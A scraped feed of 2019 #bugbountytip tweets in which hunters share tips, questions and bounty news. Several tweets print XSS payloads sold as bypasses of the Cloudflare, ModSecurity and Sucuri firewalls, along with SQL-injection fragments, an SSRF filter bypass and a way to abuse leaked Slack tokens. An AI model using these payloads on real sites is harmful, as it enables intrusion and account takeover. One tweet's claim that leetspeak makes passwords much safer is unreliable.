2019-09-06 07:59:10
0 We are updating the official website now, but always welcome all the hackers chasing the bug bounty of OSRC, any issue or question about the programs, just leave your messages or to our emailbox [email protected] #Hackers #Bugbountytip
Leonel Emiliano
@leoalgare


2019-09-06 05:02:35
0 Hey guys, is there any way to perform a bypass of CSRF if i need to set an specific XSRF-TOKEN in order to exploit the issue ? I wasn't able to use XHR because of CORS policy. Access-Control-Allow-Credentials: true Access-Control-Allow-Origin: * #bugbountytips #bugbountytip
Shubham Sharma
@Shubham_pen


2019-09-06 03:13:23
7 Today you will learn WordPress penetration testing using WPScan and Metasploit. @rajchandel @metasploit @ubuntu @kalilinux @wordpressdotcom @github #infosec #cybersecurity #bugbountytip #bugbounty #Pentesting #GodMorningFriday #CyberAttack #oscp #blackhat https://t.co/KT2wD17IVG
ak1t4 đŸ‡ŠđŸ‡·
@akita_zen


2019-09-06 02:02:10
9 #Bugbountytip: forget the subdomains for recon! go directly for the ASN & hit the network-range organization: A new world arises without waf’s, a lot of messy SSL certs, unprotected hosts & private hidden scopes! #bugbounty #infosec #thinkOutsideTheBox
C1h2e1
@C1h2e11


2019-09-05 17:05:24
1 #bugbounty #BugBountyTip I found an HTTP Request Smuggling and looked for the endpoint that echoed the request. In this endpoint, I tried to enter the long data successfully, but I ended up testing only a few characters of the request I don't know why this is😂
Ammar AmerđŸ‡žđŸ‡Ÿ
@cry__pto


2019-09-05 14:17:38
1 -“An XSS on Facebook via PNGs & Wonky Content Types”: https://t.co/K7uiWoQtZ8 -shopifyapps XSS on sales channels via currency formatting: https://t.co/wu6SZ1DcxE -UNITED AIRLINES XSS: https://t.co/kRbaMJTXlN -GOOGLE TAG MANAGER STORED XSS: https://t.co/PBAj81OEE1 #BugBountyTip
Proxy
@LinuxKodachi


2019-09-05 13:49:35
0 Here is a website that archive bug bounty tips. 👉https://t.co/hG46WtG0dd Check it out, it has other useful resources too. 😀 #bugbounty #BugBountyTip #bugbountytips @Hacker0x01
emir c a
@emirca_


2019-09-05 10:13:07
0 Got the 500 error with single quote but can’t find the SQLi parameter for it... But 500 error can lead to SQLi right? #BugBounty #bugbountytip
✎ /𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-09-05 05:59:42
0 CloudFlare {WAF} "R-XSS" Bypass; 🛡 ~ <isindex action="javas&tab;cript:alert(1)" type=image> ~ #BugBounty #BugBountyTip #WAF #infosec
David SchĂŒtz
@xdavidhu


2019-09-04 17:08:11
2 #bugbountytip - If your target requires phone number verification and you need more accounts, you can just buy a really cheap prepaid SIM card, and without topping it up, you can recieve the verification codes in SMS! ⚡ (even better if you have a dual-sim phone) https://t.co/oUDJKIik3X
Mourad
@SecuAudit


2019-09-04 16:25:54
0 How do you deal with your hosting server provider for large Port Scanning complaints ? #bugbounty #bugbountytip #pentesting #hackerone https://t.co/pn9Zzmxuaa
sudoka
@sudo_sudoka


2019-09-04 16:10:23
0 Does anyone have experience with @InternetNZ bugbounty program? #bugbounty #bugbountytip
intigriti
@intigriti


2019-09-04 12:27:00
6 Did you know you can extract the AWS S3 bucket name from an object URL by appending these parameters? đŸ•”ïžThanks for the #BugBountyTip, @neeraj_sonaniya! #HackWithIntigriti https://t.co/cfVpRpOw1s
Hackers Academy
@Hackers_Academy


2019-09-04 10:40:17
0 98 Days Left! Introducing the 2nd training... @banyrock will take you on a 4 days journey of fully practical web hacking & bug hunting training. Be ready to learn some advanced techniques! #bugbountytip #Pentesting #infosec https://t.co/ixzLERf8Io https://t.co/9B4tg5DSvF
RĂ©my Marot
@R_Marot


2019-09-03 21:13:30
0 Quick #bugbountytip : if you are testing a symfony application, do not forget to check both app_dev.php and app_test.php controllers for debug information and sometimes sensitive information disclosure
Julien Ahrens
@MrTuxracer


2019-09-03 18:36:57
0 Plaintext password disclosure leading to admin access on a development environment. That just made my day. Remember: Always dig into JS files. They're a gold mine of stuff! #BugBounty #BugBountyTip
Dhamu
@Dhamuharker


2019-09-03 15:02:54
1 #bugbountytips The AWS Cloud Post Exploitation framework! POC https://t.co/nmhvNDdIRU #BugBounty #bugbountytip #ItTakesACrowd #togetherwehitharder
abdoul gadiri balde
@moodiAbdoul


2019-09-03 12:17:38
2 #bugbountytip you can also use https://t.co/SI3CMaQq42 during recon , just search your target website or app to know how it work in short of time #infosec #bugbounty
Un4gi
@Un4gi1


2019-09-03 08:50:20
0 #bugbountytip If you don’t have enough room for typical XSS, try <base href=//url.co>. This will make every link on the same page redirect to the URL referenced! 😃
Bob Nicolson
@NicolsonBray


2019-09-03 08:01:00
0 Google throws bug bounty bucks at mega-popular third-party apps https://t.co/ZSu5DHaLjf #BugBounty #bugbountytip #google #Apps #cybersec #infosec #Hackers https://t.co/UzhkCYOmww
Meelo
@CaptMeelo


2019-09-02 12:21:41
1 Just published another post that might be useful during #bugbounty or #recon sessions. #bugbountytip https://t.co/NTTaI2KqHE
✎ /𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-09-02 06:43:33
6 ModSecurity { XSS } Detection Bypass; 🔐 { 1 }; <img src=x:alert(alt) onerror=eval(src) alt='spyerror'> { 2 }; "></tag><svg onload=alert(spyerror)> #BugBounty #BugBountyTip #WAF #infosec
Cyberthereaper
@Cyberthereaper3


2019-09-01 21:30:41
0 There is no csrf token when changing email.I'm creating csrf poc, and when I try to open poc.html with my other account, I get a "session expired" warning. what is the problem? How can i bypass it? #hackerone #bugcrowd #infosec #BugBounty #bugbountytip #csrf #intigriti
%00Termi
@Elhan65805947


2019-09-01 12:36:25
0 https://t.co/xNc07m02x7 >> campanyname.tld Paste >> https://t.co/NLo3oX2Loz Sometimes you may find upcoming project details, link to invite private meetings, other stuff. Keep on checking regularly. #bugbounty #bugbountytip
Ammar Amer
@cry__pto


2019-09-01 12:30:19
1 is is not difficult to bypass #XSS filters. remamber that firewall is a stupid device,just edit a s simple part of the payload . you can use encoding,tag modifiers. and a lot other ways like adding some unfamiliar characters or symbols to the payload. #bugbountytip
ak1t4 đŸ‡ŠđŸ‡·
@akita_zen


2019-09-01 01:43:09
7 #Bugbountytip: take your time to learn bash, curl & python 🐍 basics scripting. With only a few lines of those you can break anything! Automate your scripts & get the bests PoC’s #bugbounty #infosec
Cyberthereaper
@Cyberthereaper3


2019-08-31 17:22:20
0 how can i redirect xhr login page? Ä°f i capture request with burp , web page redirecting other web page. But i cant do it wih url? Any idea? #hackerone #bugcrowd #bugbountytip #infosec #redirect #vulnerability
Security Chops
@securitychops


2019-08-31 15:05:31
0 /dev/random - One Liner For Installing Burp Certificate Into Android Nougat and Later #burp #android #BugBounty #bugbountytip https://t.co/BtVxMMy6Jb
sudoka
@sudo_sudoka


2019-08-31 12:17:54
1 CSP can support you to make a #clickjacking possible even when X-Frame-Options: DENY. #bugbounty #bugbountytip https://t.co/AQf5mQk84W
Proxy
@LinuxKodachi


2019-08-31 06:57:10
0 Here is a google dork to find discord servers. 👉 https://t.co/bmVpQAaOgy "keyword" #bugbountytip #OpenSource #osint #Discord
Elhan
@Elhan65805947


2019-08-30 20:09:48
0 A single little dork can give admin access. Site:https://t.co/AUzqSGF92I companyname.tld Bookmark else keep intresting tabs hanging. >> win! #BugBounty #bugbountytip
Mourad
@SecuAudit


2019-08-30 17:30:33
0 I just lost 3000$USD in 2 days trading Forex , definitively Bug Bounty is more profitable and less risky than trading😰 #BugBounty #bugbountytip
Jenish Sojitra
@_jensec


2019-08-30 16:58:57
0 Yay, I was awarded a $1,200 bounty on @Hacker0x01 for tricky privilege escalation ! “ If API endpoint /api/path/ep throwing 401 try to go with /api/path/ep.json “ and it will fetch out json data without checking access control ! #bugbountytip
sagar yadav
@sagaryadav8742


2019-08-30 16:32:42
0 Hotstar swag 😊 Happy to #secure #hotstar #bugbountytip #bugbounty #bughunting #bugcrowd #hackerone #intrigity #BountyHunter #bounty #secure #website #nature #bounty #sagaryadav8742 https://t.co/iAgSxeRFre
Cyberthereaper
@Cyberthereaper3


2019-08-30 16:31:00
0 Is have dork for out of band all injection method? #hackerone #bugcrowd #infosec #bugbountytip
intigriti
@intigriti


2019-08-30 14:19:13
2 Thanks for the #BugBountyTip, @securinti! #HackWithIntigriti (P.S.: You are now banned from our live webinars) đŸ‘€đŸš« https://t.co/z8Cz3rAUgS
sagar yadav
@sagaryadav8742


2019-08-30 13:37:17
0 #redstorm swag #reward and #hof Happy to #secure #redstorm 😊 #bugbountytip #bugbounty #bughunting #bugcrowd #hackerone #intrigity #BountyHunter #bounty #secure #website #nature #zerocopter https://t.co/azpBgqAn21
3P1C
@_3P1C


2019-08-30 13:27:03
0 Bypass for SSRF filter Find a subdomain of your target (whitelisted) that resolves to an internal IP Like this internal[.]target[.]com --> 127.0.0.1 #bugbountytips #bugbountytip @intigriti @Bugcrowd @Hacker0x01
Fisher
@Regala_


2019-08-30 09:42:22
2 Yes!! Burp Scope Monitor just reached its 100th⭐!! đŸ„łđŸ„ł If you haven't used it yet, have a look at https://t.co/2zzgrNvj3G. Currently I'm especially looking for bugs/improvements suggestions so I can work on them later. #bugbounty #bugbountytip #infosec #pentest
Fady Othman
@Fady_Othman


2019-08-30 05:37:29
1 Do you think recording video tutorials using a 21:9 format (Wide Screen) is a good idea? #bugbounty #bugbountytips #bugbountytip
The_unstable
@chaskar_shubham


2019-08-29 13:03:23
0 I rewrote Recce from scratch! It is now more faster than previous version. It can now detect server. you can write output in csv file. https://t.co/CGFQHNaA64 check out! #bugbountytips #bugbountytip #bugbounty #InformationSecurity #infosec #infosecurity #hackerone #bugcrowd
Jagannath
@SecurityBoy0x01


2019-08-29 09:56:59
0 [Protip] Passwords using leetspeak are much safer than normal passwords against bruteforce-attacks with word--lists. E.g '53CURI7Y' is much secure than 'Security', when combined with password managers. #bugbountytip #Password #hacking
Cyberthereaper
@Cyberthereaper3


2019-08-28 22:59:14
0 The biggest obstacles that will prevent you in bug bounty programs. Ruby web page Json content-type Akamaighost Cloudfront Cloudflare #BugBounty #hackerone #bugcrowd #intigriti #infosec #bugbountytip
Julien Ahrens
@MrTuxracer


2019-08-28 18:23:55
1 I recently got a maximum bounty for: Reflected XSS -> Grabbed user's identity token (no auth) -> Found auth logic error that converted the token w/o the user's pwd into an auth token -> ATO & 2FA Bypass. Always maximize your impact! #togetherwehitharder #bugbountytip #BugBounty
Yadhavi
@PrincessYadhavi


2019-08-28 16:42:39
0 How much rate you will use to get best results from masscan? (1024 hosts, 5$ digitalocean vps) #bugbounty #bugbountyhelp #bugbountytip #bugbountytips #masscan
Random Robbie
@Random_Robbie


2019-08-28 10:32:27
3 #bugbountytip BUGROBBIE for discount on @binaryedgeio
Cache Bounty @127.0.0.1
@Cache_Bounty


2019-08-28 09:06:40
1 Old but very useful: https://t.co/j1GHbfHNsc #security #bugbountytip #bugbountytips
Michael Eder
@michael_eder_


2019-08-28 08:33:10
1 Authenticated dirbusting 1) Log in w/ Firefox>DevTools>Network>reload page 2) Right click request, "copy curl" 3) rustbuster <your regular rustbuster options> <all -H parameters of the curl command> 4) Profit #infosec #bugbountytip #pentest
kaustubh padwad
@s3curityb3ast


2019-08-28 08:13:39
1 Ever Happen'd this @Hacker0x01 with known guys.. @sagarparmar121 @niksthehacker @stokfredrik @fransrosen @emgeekboy @Parth_Malhotra #bugbountytip #bugbounty @gwendallecoguic #hackerone #bugcrowd @SynackRedTeam is exception for this sharp 24Hrs payout.. ;) Just for Fun #bontyfun https://t.co/wyuV36SLWt
Nihad
@nihad_rekany


2019-08-28 08:09:48
0 Feeling love đŸ„°đŸ„° @fbsecurity #bugbountytip #bug https://t.co/Pc9V8CSJuu
Nihad
@nihad_rekany


2019-08-28 08:08:24
0 Thank you @fbsecurity đŸ„°đŸ„°đŸ„° #bugbountytip https://t.co/jnggbyDNx8
Neeraj Edwards
@neeraj_sonaniya


2019-08-28 05:29:04
2 Revealing AWS S3 bucket name: step 1: Find any CDN object URL step 2: append following string to after URL: `?AWSAccessKeyId=[Valid_ACCESS_KEY_ID]&Expires=1766972005&Signature=ccc ` and boom it will reveal the bucket name. #BugBounty #security #bugbountytip #bugbountytips https://t.co/JWqGuZLHW4
Ahmed Lekssays
@Lekssays


2019-08-27 22:51:16
0 I made a tool to Extract Open Kibana Instances on Internet and Map them to their Corresponding Organizations using SSL certificates for Bug Bounty Programs. You can check it out: https://t.co/IQQIKdaAaC Happy hunting ;) #bugbounty #bugbountytip
Radek
@radekk


2019-08-27 19:45:52
1 Read how to use Burp Suite with multiple Firefox profiles - https://t.co/xqRPeT8NfC #bugbountytip #bugbounty
Aussan 🇹🇩
@aussan_m


2019-08-27 18:15:36
1 #bugbounty #bugbountytip When you get a bounty try to remember that there are people in need out there...try to give to charities, ... helping companies become secure is great, but helping others is even better.... remember what goes around comes around....
kaustubh padwad
@s3curityb3ast


2019-08-27 16:31:02
0 If you could ever build such complex query and if it returned 404 in "boolean based blind sql injection" AND ORD(MID((SELECT IFNULL(CAST(column_name AS CHAR),0x21) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x70686f746f73. what will be your reaction... #bugbountytip #ctf
✎ /𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-08-27 00:31:48
3 CloudFlare {"HTML TO XSS"}; ~byPass Detected. 📡 [" <style>@KeyFrames z{</style><div style=animation-name:z onanimationend=&#97&#108&#101&#114&#116`1`> %253Cscript%253Ealert('XSS')%253C%252Fscript%253E "</script> "] #BugBounty #BugBountyTip #WAF #infosec
✎ /𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-08-26 23:48:19
0 CloudFlare {"XSS"}; ~byPass Detected. 📡 <style>@KeyFrames z{</style><div style=animation-name:z onanimationend=&#97&#108&#101&#114&#116`1`> %253Cscript%253Ealert('XSS')%253C%252Fscript%253E "</script> #BugBounty #BugBountyTip #WAF #infosec
Cyberthereaper
@Cyberthereaper3


2019-08-26 21:52:05
0 I think one of the pages you hate to open the xss alert box is that it uses the ruby ​​software language. #bugbounty #bugbountytip #hackerone #bugcrowd #infosec #redteam #xss #hacking
Murdockz
@Murdockz_CEH


2019-08-26 17:36:42
0 Created my first "Real" python script that decodes any base64 string...I think lol. Don't judge me it's my first time learning python lol. Check it out. #bugbountytip #bugbountytips #bugbounty https://t.co/rSnsf6BoBb
kaustubh padwad
@s3curityb3ast


2019-08-26 17:19:32
0 This is how I learn SQL Injection Now a days... #rofl #ctf #SQL #injection #bugbountytip #wireshark #hackerone #AppSec but I can imagine how tough is this to exploit, since sqlmap is taking too much time now its 2+ Hours with --dump-all... :) https://t.co/t1G0qtaNQh
გოჩა ოჄრაძე (Gocha Okradze)
@GochaOqradze


2019-08-26 16:50:20
0 Regexp trying detect Open redirect in response for burp #bugbountytips #bugbountytip https://t.co/LTbegfJf77
Murdockz
@Murdockz_CEH


2019-08-26 09:48:23
1 My first bug crowd P1. API Keys, Firebase Tokens, Account username and password. Recon wins. #BugBounty #bugbountytip #bugbountytip https://t.co/K6C0mnajQH
Hussein Daher
@HusseiN98D


2019-08-25 14:31:51
10 As per the vote results, here you go! A cool XXE resulting from a SSRF found on local company website during a pentest. DMs are open, retweet and like if you love this style of PoC! 😎 #bugbounty #bugbountytip #bugbountytips #infosec https://t.co/XbwBLdYO33
gautam bhatia
@gautambhatia57


2019-08-25 11:14:23
0 Thanks a lot @defcon @DCG91135 @Bugcrowd @lab401 @infosecgirls @hackthebox_eu @PortSwigger for amazing workshop at DIT University #infosec #security #reversing #bugbountytip #rfid https://t.co/wqtmwLM4y9
Arif Khan
@payloadartist


2019-08-24 14:17:36
2 Another awesome research by a god of websec @filedescriptor: The Cookie monster in your browsers https://t.co/x051kiyWgJ #BugBounty #BugBountyTip
Hussein Daher
@HusseiN98D


2019-08-24 13:52:55
1 My next #bugbountytip PoC (check my Twitter for a preview of the old ones) should talk about: #bugbounty
Yogendra Jaiswal
@vulnh0lic


2019-08-24 13:28:31
17 Just Published article of [iOS Application Security] Jailbreak 12.4 and SSL pinning bypass | How to set up your iOS Testing Lab https://t.co/kVAs20V8dC #infosec #bugbountytip #sslbypass #jailbreak #iOS124 #unc0ver Thanks, @prateek_0490 and @Yassineaboukir @jpjaypatel34
Andri Wahyudi đŸ•Šïž ‏
@andripwn


2019-08-24 11:25:33
1 Time US : 10:00 Time ID : 21:00 Bug Bounty Live! basic #recon , VulnerabilityAnalysis #shodan Live at : https://t.co/QdsrDoweOQ Follow Live streams and share... #BugBounty #bugbountytips #bugbountytip #hackerone #bugcrowd
Raihan Biswas 🇹🇼
@zapstiko


2019-08-24 05:01:29
3 Sucuri {` XSS ÂŽ}; payloads `appeared fresh, confirmed.ÂŽ ↭ Active </1>; "><BODY onload!#$%&()*~+-_.,:;[email protected][/|\]^`=alert("XSS")> Active </2>; <;br size=\";&;{alert('XSS')}\";>; #BugBounty #BugBountyTip #WAF #infosec
Vitthal Shinde
@0_1VitthalS


2019-08-24 04:11:48
1 If you found a hardcoded slack token, you can use it to get invitation to slack group. https://t.co/OMxs8QFVjQ<slack_token>&channel=CL0KQ4SK1&user=<email>&pretty=1 #BugBountyTip
✎ /𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-08-23 06:41:14
1 Sucuri {` XSS ÂŽ}; payloads `appeared fresh, confirmed.ÂŽ ↭ Active </1>; "><BODY onload!#$%&()*~+-_.,:;[email protected][/|\]^`=alert("XSS")> Active </2>; <;br size=\";&;{alert('XSS')}\";>; #BugBounty #BugBountyTip #WAF #infosec
Uranium238
@uraniumhacker


2019-08-22 18:02:56
1 Have your tools exporting stuff as JSON? use Panda to export it as a .db file. You can then use client side js to parse the db and query through it. #bugbountytip
contra_security
@security_contra


2019-08-22 17:46:16
0 Analysis of Ruby rest-client 1.6.13 backdoor https://t.co/KGSXYpw68B @snyksec #owasp #backdoor #ruby #appsec #bugbountytip
m0z
@LooseSecurity


2019-08-22 16:47:55
6 file.php?url=/admin/ Redirects to: https://t.co/xsJrSUcfgM Put URL [email protected] Now it is